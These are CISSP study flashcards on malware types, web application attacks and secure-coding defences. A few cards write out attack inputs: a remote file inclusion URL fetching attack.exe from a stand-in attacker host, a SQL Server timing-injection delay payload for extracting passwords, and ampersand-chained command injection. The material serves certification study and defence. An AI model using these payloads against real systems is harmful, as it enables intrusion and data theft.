CISSP ch 21 Flashcards

1
Q

Virus functions

A

two main functions – propagation and payload execution

2
Q

MBR (virus)

A

master boot record virus

One of the earliest known forms of infection

Attack the MBR – the portion of bootable media (e.g., hard disk or flash drive) that the computer uses to load the operating system during the boot process

MBR is extremely small, usually 512 bytes, can’t contain all the code required to implement the virus’ propagation and destructive functions

To bypass space limitation, store the majority of their code on another portion of the storage media

When system reads the infected MBR, virus instructs it to read and execute the code stored in this alternate location

Most MBR viruses are spread between systems through the use of infected media inadvertently shared between users

If the infected media is in the drive during the boot process, the target system reads the infected MBR, and the virus loads into memory and infects the MBR on the target system’s hard drive

3
Q

Master boot record

A

not the boot sector

MBR is a single disk sector, normally the first sector of the media that is read in the initial stages of the boot process. MBR then determines which media partition contains the operating system and then directs the system to read that partition’s boot sector to load the operating system. Viruses can attack both the MBR and the boot sector, with similar results

4
Q

File infector virus

A

Viruses that infect different types of executable files and trigger when the operating system attempts to execute them

On Windows-based systems, these viruses affect executable files and scripts such as:

.exe

.com

.msc

Standard file infector viruses that do not use cloaking techniques such as stealth or encryption are often easily detected by comparing file characteristics (size, modification date) before and after infection or by comparing hash values

5
Q

Companion virus

A

Variation of the file infector virus

Self-contained executable files that escape detection by using a filename similar to, but slightly different from, a legitimate operating system file

Rely on the default file name extensions that Windows-based operating systems append to commands when executing program files (in this order)

.com

.exe

.bat

E.g., replacing game.exe with game.com – if you open a command prompt and simply type GAME, the operating system would execute the virus file (game.com) instead of game.exe

6
Q

VBA

A

visual basic for applications = programming language used by scripting functionalities

7
Q

Macro viruses

A

Leverages scripting functionality implemented in common software applications

E.g., the Melissa virus in 1999 and the I Love You virus in 2000 spread through Word documents and exploited a vulnerability in Outlook to replicate

8
Q

Service injection virus

A

Inject themselves into trusted runtime processes of the operating system, such as svchost.exe, winlogon.exe and explorer.exe

Bypasses detection by any antivirus software running on the host

Best protection: ensure that all software allowing the viewing of web content (browsers, media players, helper applications) receives current security patches

9
Q

Multipartite viruses

A

Use more than one propagation technique

E.g., virus might infect critical COM and EXE files by adding malicious code to each file (file infector virus), then write malicious code to the system’s master boot record (boot sector virus)

10
Q

stealth viruses

A

Hide themselves by actually tampering with the operating system to fool antivirus packages into thinking that everything is functioning normally

E.g., overwriting the system’s master boot record but then modifying the operating system’s file access functionality to cover its tracks

11
Q

polymorphic viruses

A

Modify their own code as they travel from system to system

Propagation and destruction techniques remain the same, but the signature of the virus is somewhat different each time it infects a new system

Current versions of anti-virus software are able to detect known polymorphic viruses

12
Q

encrypted viruses

A

Use cryptographic techniques to avoid detection

In their outward appearance, quite similar to polymorphic viruses, each infected system has a virus with a different signature

However, do not generate these modified signatures by changing their code, instead they alter the way they are stored on the disk

Use a very short segment of code, known as the virus decryption routine, which contains the cryptographic information necessary to load and decrypt the main virus code stored elsewhere on the disk. Each infection utilizes a different cryptographic key, causing the main code to appear completely different on each system.

However, the virus decryption routines often contain telltale signatures that render them vulnerable to updated antivirus software packages

13
Q

trojan horses

A

software program that appears benevolent but carries a malicious, behind-the-scenes payload that has the potential to wreak havoc on a system or network

14
Q

RATs

A

Remote access Trojans = open backdoors in systems that grant the attacker remote administrative control of the infected systems

E.g., a RAT might open a Secure Shell (SSH) port on a system that allows the attacker to use a preconfigured account to access the system and then send a notice to the attacker that the system is ready and waiting for a connection

15
Q

cryptomalware

A

designed to steal computing power from infected systems for use in mining Bitcoin or other cryptocurrencies

16
Q

worms

A

contain same destructive potential as other malicious code objects with an added twist – they propagate themselves without requiring any human intervention

17
Q

PUPs

A

potentially unwanted programs = software that a user might consent to installing on their system that then carries out functions that the user did not desire or authorize

18
Q

Scripting technology

A

automate input of commands = also available to improve the efficiency of malicious actors = commonly found in a class of malware known as fileless malware

19
Q

Fileless malware

A

never writes files to disk, making it more difficult to detect = e.g., a link might exploit a browser vulnerability to execute code that downloads and runs a PowerShell script entirely in memory, where it triggers a malicious payload

20
Q

Antivirus responses to detection

A

If the software can eradicate the virus, it disinfects the affected files and restores the machine to a safe condition

If the software recognizes the virus but doesn’t know how to disinfect the files, it may quarantine the files until the user or an administrator can examine them manually

If security settings/policies do not provide for quarantine or the files exceed a predefined danger threshold, the antivirus package may delete the infected files in an attempt to preserve system integrity

21
Q

File integrity monitoring tools

A

secondary anti-virus functionality = designed to alert administrators to unauthorized file modifications = maintain a database of hash values for all files stored on the system; archived hash values are then compared to currently computed values to detect any files that were modified between the two points in time

22
Q

EDR

A

endpoint detection and response packages = go beyond traditional antimalware protection to help protect endpoints against attack = combine the antimalware capabilities found in traditional antivirus packages with advanced techniques designed to better detect threats and take steps to eradicate them; some specific capabilities include:

Analyzing endpoint memory, filesystem, and network activity for signs of malicious activity

Automatically isolating possible malicious activity to contain the potential damage

Integration with threat intelligence sources to obtain a real-time insight into malicious behavior elsewhere on the internet

Integration with other incident response mechanisms to automate response efforts

23
Q

MDR

A

managed detection and response services = where security vendors offer EDR capabilities and also provide installation, configuration, and monitoring services to reduce load on customer security teams

24
Q

UEBA

A

user and entity behavior analytics packages

pay particular attention to user-based activity on endpoints and other devices, building a profile of each individual’s normal activity and then highlighting deviations from that profile that may indicate a potential compromise

UEBA tools differ from EDR capabilities in that UEBA has an analytic focus on the user, whereas EDR has an analytic focus on the endpoint

25
Q

buffer overflow vulnerabilities

A

exist when a developer does not properly validate user input to ensure that it is of an appropriate size; input that is too large can “overflow” a data structure and affect other data stored in the computer’s memory

can corrupt other data stored in memory or at worst, be used to overwrite system commands, allowing attacker to execute targeted commands on the server

26
Q

buffer overflow defenses

A

The user can’t enter a value longer than the size of any buffer that will hold it

The user can’t enter an invalid value for the variable types that will hold it

The user can’t enter a value that will cause the program to operate outside its specific parameters

27
Q

CGI

A

Common Gateway Interface = language that allows unskilled programmers to quickly create interactive web pages = buffer overflow vulnerabilities are especially prevalent in code developed rapidly for the web using this language and other similar languages

28
Q

TOC and TOU

A

TOC = time of check = the time at which the subject checks on the status of the object; there may be several decisions to make before returning to the object to access it

TOU = time of use = when the decision is made to access the object

29
Q

TOCTTOU attacks / race conditions

A

when the difference between the TOC and the TOU is large enough for an attacker to replace the original object with another object that suits their own needs; the attacker is racing with the legitimate process to replace the object before it is used = example of a state attack (attacks timing, data flow control and the transition from one system state to another)

E.g., replacing a data file after its identity has been verified but before data is read

30
Q

rootkits

A

common way that attackers wage privilege escalation attacks = freely available on the internet and exploit known vulnerabilities in various operating systems = root is the administrator level

31
Q

injection vulnerabilities

A

allows an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute

32
Q

SQL injection attacks

A

attacker sends an unusual request to the web server, usually involving commands, including requests that execute commands that modify records, drop tables, or perform other actions that violate the integrity and/or availability of databases

33
Q

blind SQL injection

A

when some SQL injection flaws do not provide the attacker with a means to directly view the results of the attack

34
Q

blind content-based SQL injection attack

A

perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack

E.g., adding 1=2 at the end of the request to see whether the web application is vulnerable (vulnerable if it returns no results, which means the web server looks past the end of the request)

If vulnerable, attacker can then attempt more malicious queries that alter the contents of the database or perform other unwanted actions

35
Q

blind timing-based SQL injection attacks

A

using the amount of time required to process a query as a channel for retrieving information from a database

Attacks depend on delay mechanisms provided by different database platforms. E.g., Microsoft SQL Server’s Transact-SQL allows a user to specify a command such as this:

WAITFOR DELAY '00:00:15'

This would instruct the database to wait 15 seconds before performing the next action. An application that immediately returns the results is probably not vulnerable to timing-based attacks

Can be used to identify each character of a password, one by one, by instructing the database to wait a certain amount of time if the character is equal to the current letter

Tools like SQLmap and Metasploit automate blind timing-based attacks

36
Q

Code injection attacks

A

general class of attacks that include SQL injection attacks = seek to insert attacker-written code into the legitimate code created by a web application developer

37
Q

LDAP injection attack

A

Attackers embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query

focus of the attack is on the back end of an LDAP directory service rather than a database server

38
Q

XML injection

A

where the back-end target is an XML application

Commands may attempt to load dynamically linked libraries (DLL) containing malicious code in a DLL injection attack

39
Q

command injection attacks

A

where application code reaches back to the operating system to execute a command

an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system

E.g., adding an ampersand (&) to indicate that the operating system should execute the text after the ampersand as a separate command, allowing the attacker to execute commands (e.g., the rm command, used to remove something) by exploiting an input field that is only intended to execute a mkdir command (the create-new-directory command)

40
Q

Authorization vulnerabilities

A

allow an attacker to exceed the level of access that they are authorized

41
Q

OWASP

A

Open Web Application Security Project = a nonprofit security project focused on improving security for online or web-based applications = maintains a top 10 list of the most critical web application security risks and the top 10 proactive controls to protect against application security issues

42
Q

Insecure direct object reference

A

if the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority by editing a query string or a POST request in the URL

43
Q

Directory traversal attacks

A

when web servers allow the inclusion of operators that navigate the directory paths and file system access controls don’t properly restrict access to files stored elsewhere on the server

E.g., in Linux operating systems, the .. operator in a file path refers to the directory one level higher than the current directory. Directory traversal attacks use this knowledge and attempt to navigate outside of the areas of the filesystem that are reserved for the web server

44
Q

file inclusion attacks

A

directory traversal attacks taken to the next level = instead of simply retrieving a file and displaying it, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code

45
Q

local file inclusion attacks

A

seek to execute code stored in a file located elsewhere on the web server

E.g., a file that the attacker uploaded to a directory on a Windows server

46
Q

Remote file inclusion attacks

A

allow the attacker to execute code that is stored on a remote server

Attacker can directly control the code being executed without having to first store a file on the local server

E.g., http://www.mycompany.com/app.php?include=http://evil.attacker.com/attack.exe

47
Q

Web shells

A

allow the attacker to execute commands on the server and view the results in the browser = provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable to detection by security tools, attacker may even repair the initial vulnerability they used to gain access to the server to prevent its discovery by another attacker seeking to take control of the server or by a security team

48
Q

XSS

A

cross-site scripting attacks = when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page

49
Q

Reflected XSS

A

when an application allows reflected input, e.g., adding a script into the ‘name’ field of a form to ‘reflect’ the input

Can be used to embed form input in a link. When a user visits the link, the web page is an authentic website, but executes the script included in the input by the malicious link creator

When creating web applications that allow any type of user input, developers must be sure to perform input validation. Applications should never allow a user to include the <script> tag in a reflected input field

50
Q

Output encoding

A

set of techniques that take user-supplied input and encode it using a series of rules that transform potentially dangerous content into a safe form, e.g., HTML encoding transforms the single quote (') character into the encoded string &#x27;

specific techniques:

HTML entity encoding

HTML attribute encoding

URL encoding

JavaScript encoding

CSS hex encoding

51
Q

Stored/Persistent XSS

A

remain on the server even when the attacker isn’t actively waging an attack = e.g., a user inserts HTML script into a blog post to redirect users to a phishing site, request sensitive information or perform another attack

52
Q

DOM

A

Document Object Model environment within a user’s browser = can be modified by XSS attacks without appearing in the HTML code of the web page

53
Q

Request forgery attacks

A

exploit trust relationships and attempt to have users unwittingly execute commands against a remote server = come in two forms: CSRF / XSRF and SSRF

54
Q

CSRF / XSRF

A

Cross-site request forgery

Exploit the trust that remote sites have in a user’s system to execute commands on the user’s behalf

Makes the reasonable assumption that users are often logged into many different websites at the same time

Attackers then embed code in one website that sends a command to a second website

When the user clicks the link of the first site, they are unknowingly sending a command to the second site

To protect against XSRF attacks, create web applications that use secure tokens that the attacker would not know to embed in links, and check the referring URL in requests received from end users, accepting only requests that originated from the site itself

55
Q

SSRF

A

Server-side request forgery

Trick a server into visiting a URL based on user-supplied input

Possible when a web application accepts URLs from user as input and then retrieves information from that URL

If the server has access to non-public URLs, an SSRF attack can unintentionally disclose that information to an attacker

56
Q

Session hijacking attacks

A

when a malicious individual intercepts part of the communication between an authorized user and a resource and then uses a hijacking technique to take over the session and assume the identity of the authorized user = common techniques:

Capturing details of the authentication between a client and server and using those details to assume the client’s identity

Tricking the client into thinking the attacker’s system is the server, acting as the intermediary as the client sets up a legitimate connection with the server, and then disconnecting the client (man in the middle)

Accessing a web application using the cookie data of a user who did not properly close the connection or of a poorly designed application that does not properly manage authentication cookies

57
Q

Input whitelisting

A

allow listing

Developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers

58
Q

input blacklisting

A

block listing

Developers describe potentially malicious input that must be blocked, e.g., HTML tags or SQL commands in user input

59
Q

metacharacters

A

characters that have been assigned special programmatic meaning, e.g., single and double quotation marks, open/close square brackets, backslash, semicolon, ampersand, caret (^), dollar sign, period or dot, vertical bar, pipe symbol, question mark, asterisk, plus sign, open/close curly braces, and open/close parentheses

60
Q

parameter pollution

A

technique to defeat input validation

sends a web application more than one value for the same input variable

depends on defects in web platforms that don’t handle multiple copies of the same parameter properly

60
Q

escaping a metacharacter

A

process of marking the metacharacter as merely a normal or common character, such as a letter or number, thus removing its special programmatic powers

Often done by adding a backslash in front of the character

61
Q

WAFs

A

Web application firewalls

Function similarly to network firewalls, but they work at the application layer of the OSI model

Sits between the DMZ and the web server; the DMZ itself is behind the network firewall, which protects both the internal network and the DMZ/web server

Scrutinizes the input headed to the application, performing input validation before passing the input to the web server

62
Q

parameterized queries

A

protects against injection attacks = developer prepares an SQL statement and then allows user input to be passed into that statement as carefully defined variables that do not allow the insertion of code (fill in the blanks)

different programming languages have different functions to perform this task:

Java uses the PreparedStatement() function

PHP uses the bindParam() function

63
Q

stored procedures

A

similar to parameterized queries but the SQL code is not contained within the application but is stored on the database server, client does not directly send SQL code to the database server, instead client sends arguments to the server, which then inserts those arguments into a precompiled query template

Protects against injection attacks and also improves database performance

64
Q

tokenization

A

Replaces personal identifiers that might directly reveal an individual’s identity with a unique identifier using a lookup table

Must keep lookup table secure

65
Q

code signing

A

way for developers to confirm the authenticity of their code to end users

Use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer’s public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals

Corresponding public key is included in a digital certificate that is distributed with the application

Does not guarantee that the code is safe, only that it was signed by the holder of the private key and was not modified afterward. If a developer digitally signs malicious code, that code will pass the signature verification process

66
Q

SDKs

A

software development kits

collections of software libraries combined with documentation, examples and other resources designed to help programmers get up and running quickly in a development environment, often include specialized utilities designed to help developers design and test code

67
Q

code libraries

A

consist of shared code objects that perform related functions (e.g., biology research, financial analysis or social media)

68
Q

dead code

A

code that is in use in an organization but nobody is responsible for its maintenance, and nobody may even know where the original source files reside

69
Q

code integrity measurement

A

uses cryptographic hash functions to verify that the code being released into production matches the code that was previously approved

70
Q

scalability

A

Applications should be designed so that computing resources they require may be incrementally added to support increasing demand

71
Q

vertical scaling

A

scaling up = adding more resources to an existing computing instance

72
Q

horizontal scaling

A

scaling out = adding additional instances to a pool

73
Q

elasticity

A

Applications should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when they are no longer needed (scale up and down)

74
Q

error handling

A

e.g., try…catch functionality, allows developers to explicitly specify how errors should be handled

overly verbose error handling routines may present a risk, do not explain too much about the inner workings of code (e.g., that database is running the MySQL database engine)

75
Q

hard-coded credentials

A

developers may include usernames and passwords in source code

76
Q

Resource exhaustion

A

systems consume all of the memory, storage, processing time or other resources available on the system, rendering it disabled or crippled for other uses

77
Q

memory leak

A

an application fails to return some memory that it no longer needs, perhaps by simply losing track of an object that it has written to a reserved area of memory. If the application continues to do this over a long period of time, it can slowly consume all of the memory available to the system, causing it to crash = rebooting resets the problem, but the cycle begins anew

78
Q

memory pointers

A

area of memory that stores an address of another location in memory

79
Q

pointer dereferencing

A

when an application follows the pointer and accesses the memory referenced by the pointer address

80
Q

NULL value

A

what is contained in an empty pointer

81
Q

NULL pointer exception

A

caused when the application tries to dereference a NULL pointer

best case: causes program to crash, providing attacker with access to debugging information

worst case: may allow an attacker to bypass security controls